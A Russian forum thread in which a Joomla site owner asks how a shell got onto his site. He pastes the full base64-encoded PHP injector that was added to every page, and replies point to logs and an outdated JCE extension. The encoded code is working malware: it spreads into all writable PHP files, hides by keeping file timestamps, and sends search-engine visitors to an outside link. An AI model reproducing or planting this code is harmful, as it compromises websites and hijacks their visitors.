Заливают шелл - как избавиться?

ГЧ
На сайте с 23.04.2012
Offline
9
1171

Есть сайт на Joomla 1.5 + virtuemart, через некоторое время обнаружил что на сайт залили шелл и на всех страницах дописан вредоносный код:

<?eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQppZ25vcmVfdXNlcl9hYm9ydCgxKTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cigkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1BBVEhfVFJBTlNMQVRFRCddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cihzdHJfcmVwbGFjZSgnXFxcXCcsICdcXCcsICRfU0VSVkVSWydQQVRIX1RSQU5TTEFURUQnXSksIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmZ1bmN0aW9uIGRpcl9wYXRoKCRkaXIpIHsNCgkkY29kZT0nDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbXCdIVFRQX1JFRkVSRVJcJ107DQokdWE9JF9TRVJWRVJbXCdIVFRQX1VTRVJfQUdFTlRcJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vdGlueXVybC5jb20vbGVxZmhyOCIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfSc7DQoJJGRoID0gb3BlbmRpcigkZGlyKTsNCgkkcGF0aF9jdXJlbnQgPSAnJzsNCgl3aGlsZSAoKCRmaWxlID0gcmVhZGRpcigkZGgpKSAhPT0gZmFsc2UpDQoJaWYgKCRmaWxlICE9ICIuIiBhbmQgJGZpbGUgIT0gIi4uIikNCgl7DQoJCSRwYXRoID0gJGRpci4iLyIuJGZpbGU7DQoJCW1ha2VjaGFuZ2UoJHBhdGgsJGNvZGUpOw0KCQlpZiAoaXNfZGlyKCRwYXRoKSAmJiAhc3RyaXN0cigkcGF0aCwiY2dpLWJpbiIpKQ0KCQl7DQoJCQkkcGF0aF9jdXJlbnQgLj0gIiRwYXRoIjsNCgkJCQ0KCQkJJHBhdGhfY3VyZW50IC49IGRpcl9wYXRoKCRwYXRoKTsNCg0KCQl9DQoJfQ0KCWNsb3NlZGlyKCRkaCk7DQoJcmV0dXJuICRwYXRoX2N1cmVudDsNCn0NCg0KZnVuY3Rpb24gbWFrZWNoYW5nZSAoJHBhdGgsJGNvZGUpew0KCWlmIChpc193cml0YWJsZSgkcGF0aCkpIHsNCgkJaWYgKGlzX2ZpbGUoJHBhdGgpKSB7DQoJCQlpZiAoc3RyaXN0cigkcGF0aCwiLnBocCIpIGFuZCAhc3RyaXN0cigkcGF0aCwiYmFubmVyIikgYW5kICFzdHJpc3RyKCRwYXRoLCJtb3ZpZSIpIGFuZCAhc3RyaXN0cigkcGF0aCwic3RvcnkiKSBhbmQgIXN0cmlzdHIoJHBhdGgsIm1vZCIpIGFuZCAhc3RyaXN0cigkcGF0aCwiZ2lmIikgYW5kICFzdHJpc3RyKCRwYXRoLCJtb2RfbG9naW5zIikgYW5kICFzdHJpc3RyKCRwYXRoLCJqb29tamEiKSBhbmQgIXN0cmlzdHIoJHBhdGgsImNvbnRhbnQiKSBhbmQgIXN0cmlzdHIoJHBhdGgsInBvc3QiKSBhbmQgIXN0cmlzdHIoJHBhdGgsImltZyIpKXsNCgkJCQkkZm89ZmlsZV9nZXRfY29udGVudHMgKCRwYXRoKTsNCgkJCQlpZiAoIXN0cmlzdHIoJGZvLCJiYXNlNjQiKSkgew0KCQkJCQkkYWE9ZmlsZWN0aW1lICgkcGF0aCk7DQoJCQkJCSRmaT1wcmVnX3JlcGxhY2UoIi88XD9waHAvIiwiPD9waHAJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCQkJZXZhbChiYXNlNjRfZGVjb2RlKFwiIi5iYXNlNjRfZW5jb2RlKCRjb2RlKS4iXCIpKTsiLCRmbyk7DQoJCQkJCSRmcm89Zm9wZW4oJHBhdGgsInciKTsNCgkJCQkJZndyaXRlICgkZnJvLCRmaSk7DQoJCQkJCWZjbG9zZSAoJGZybyk7DQoJCQkJCUB0b3VjaCAoJHBhdGgsJGFhKTsNCgkJCQkJJGJ1bz1mb3BlbigibCIsImErIik7DQoJCQkJCWZ3cml0ZSAoJGJ1bywkcGF0aC4iXG4iKTsNCgkJCQkJZmNsb3NlKCRidW8pOw0KCQkJCQkvL2VjaG8gJHBhdGguIlxuIjsNCgkJCQl9ZWxzZSB7DQoJCQkJCSRhYT1maWxlY3RpbWUgKCRwYXRoKTsNCgkJCQkJJGZpPXByZWdfcmVwbGFjZSgiL2V2YWxcKGJhc2U2NF9kZWNvZGVcKFwiKC4qPylcIi8iLCJldmFsKGJhc2U2NF9kZWNvZGUoXCIiLmJhc2U2NF9lbmNvZGUoJGNvZGUpLiJcIiIsJGZvKTsNCgkJCQkJJGZybz1mb3BlbigkcGF0aCwidyIpOw0KCQkJCQlmd3JpdGUgKCRmcm8sJGZpKTsNCgkJCQkJZmNsb3NlICgkZnJvKTsNCgkJCQkJQHRvdWNoICgkcGF0aCwkYWEpOw0KCQkJCQkkYnVvPWZvcGVuKCJjIiwiYSsiKTsNCgkJCQkJZndyaXRlICgkYnVvLCRwYXRoLiJcbiIpOw0KCQkJCQlmY2xvc2UoJGJ1byk7DQoJCQkJCS8vZWNobyAkcGF0aC4iXG4iOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCX0NCn0NCiRkb2NkaXI9JF9TRVJWRVJbRE9DVU1FTlRfUk9PVF07DQplY2hvICRkb2NkaXI7DQokcGFwPXByZWdfc3BsaXQoIi9cLy8iLCRkb2NkaXIpOw0KLy9mb3JlYWNoICgkcGFwIGFzICRwYXBwKXsNCmZvciAoJGk9MDskaTxjb3VudCgkcGFwKS0yOyRpKyspew0KJHVwZG9jZGlyLj0kcGFwWyRpXS4iLyI7DQp9DQokZG9jZGlyPSR1cGRvY2RpcjsNCmRpcl9wYXRoKCRkb2NkaXIpOw=="));?>

Так же есть скрипт, который дописывает эту дрянь во все файлы с расширением php.

В связи с этим возникает вопрос - как залили шелл и как от этого уберечься?

Один раз уже всё вычистил, сменил пароли от ftp и админки, всё равно появилось.

pauk
На сайте с 26.01.2005
Offline
543
#1
Гена Черкесов:
Один раз уже всё вычистил, сменил пароли от ftp и админки, всё равно появилось.

Смотрим прикреплённый топик и логи...

Возможно, дело в дырявом дополнении.

Hi!
KE
На сайте с 29.12.2008
Offline
58
#2

Если установлен JCE, обновить до последней версии. В линейке 1.х дыра, через которую шеллы заливаются.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий